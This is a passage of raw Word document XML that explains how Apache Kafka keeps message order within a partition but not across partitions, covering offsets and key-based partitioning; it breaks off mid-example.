    <w:p w14:paraId="014EA873" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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Kafka ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message order within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by maintaining strict sequence consistency for messages within that partition. Here’s how Kafka achieves this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A104AA" w14:textId="77777777" w:rsidR="00814F7B"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943361">
          <v:rect id="_x0000_i3211" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="593CD323" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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1. Partition-level Message Ordering Guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7CC1CE" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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essage Sequence</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka guarantees that messages written to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be consumed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exact order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> they were produced. This is because each message is assigned a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the partition, which is an integer that increases monotonically as new messages are added. This offset is used by consumers to track the message position in the partition and ensures the order of message consumption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623B862" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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Offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Each message in Kafka is assigned an </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is a sequential, unique number within a partition. The offset helps track which messages have been processed by the consumer. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23653217" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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Msg1 has offset 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F4F74" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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Msg2 has offset 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D810B3" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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Msg3 has offset 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33056ABC" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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Consumers read messages in the order of the offset. If a consumer reads from offset 0, it will receive </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg1</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, then </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg2</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and then </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, preserving the order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC819D" w14:textId="77777777" w:rsidR="00814F7B"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A83E549">
          <v:rect id="_x0000_i3212" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="336563A4" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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2. How Kafka Achieves Message Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AC4AF1" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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roducer and Partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a producer sends messages to a Kafka topic, it determines the partition for each message. This can be done based on a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message key</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or the default partitioning strategy (round-robin or hash-based). If multiple messages with the same key are produced, they will be sent to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, thus preserving order for those related messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3DA84" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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ingle Partition Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Once the messages are sent to a particular partition, Kafka stores them in the order they are received. Since Kafka ensures that </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all messages in a partition are ordered by their offsets</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it guarantees that consumers will read them in the same sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2C10F" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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lastRenderedPageBreak/>
        <w:t>Consumer Reading Order</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Consumers fetch messages based on their offsets. If a consumer is consuming from partition P1, it will fetch messages in the same order they were stored. When the consumer commits an offset, it indicates that it has successfully processed up to that point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD544C1" w14:textId="77777777" w:rsidR="00814F7B"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0FFDB37">
          <v:rect id="_x0000_i3213" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BB4D98" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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3. Implications of Partitioning on Message Ordering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CA3E0" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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While Kafka guarantees message ordering </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, partitioning introduces complexity when it comes to message ordering </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>across partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here are the key implications of partitioning on message order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6147922D" w14:textId="77777777" w:rsidR="00814F7B"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89A194">
          <v:rect id="_x0000_i3214" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BFC555" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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A. Ordering Within a Partition (Maintained):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05020076" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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Guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maintains message order within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning the messages are consumed in the same order they were produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D85348" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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mpact</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This guarantees that applications that need to process messages in a specific sequence (such as logs, event timelines, or transactions) can rely on Kafka to maintain that order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFD5A2" w14:textId="77777777" w:rsidR="00814F7B"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5086103">
          <v:rect id="_x0000_i3215" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB397F2" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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B. Ordering Across Partitions (Not Guaranteed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D8EE91" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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No Global Ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> any ordering of messages </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>across different partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If you have multiple partitions in a Kafka topic, the messages in one partition can be consumed before or after the messages in another partition, depending on which partition is processed by the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B44E760" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="150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artitioning Strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka ensures ordering only within a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but if messages are produced to different partitions, the order is not guaranteed. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D1847" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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artition P1: Msg1, Msg2, Msg3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4943CC" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="150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artition P2: Msg4, Msg5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBAA115" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7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A consumer group may consume messages from both partitions in parallel. </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg4</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> could be consumed before </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, even though </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Msg3</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was produced earlier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C27067" w14:textId="77777777" w:rsidR="00814F7B"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D7E9D69">
          <v:rect id="_x0000_i3216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F0E16" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B"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C. Key-Based Partitioning (Preserves Order for Related Data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC46C6" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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o ensure that related messages maintain their order across multiple messages, Kafka allows producers to specify a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message key</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The producer can use this key to ensure that all messages with the same key go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same partition</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4723D92B" w14:textId="77777777" w:rsidR="00814F7B" w:rsidRPr="0003272F" w:rsidRDefault="00814F7B" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15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For example, if you have messages related to a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
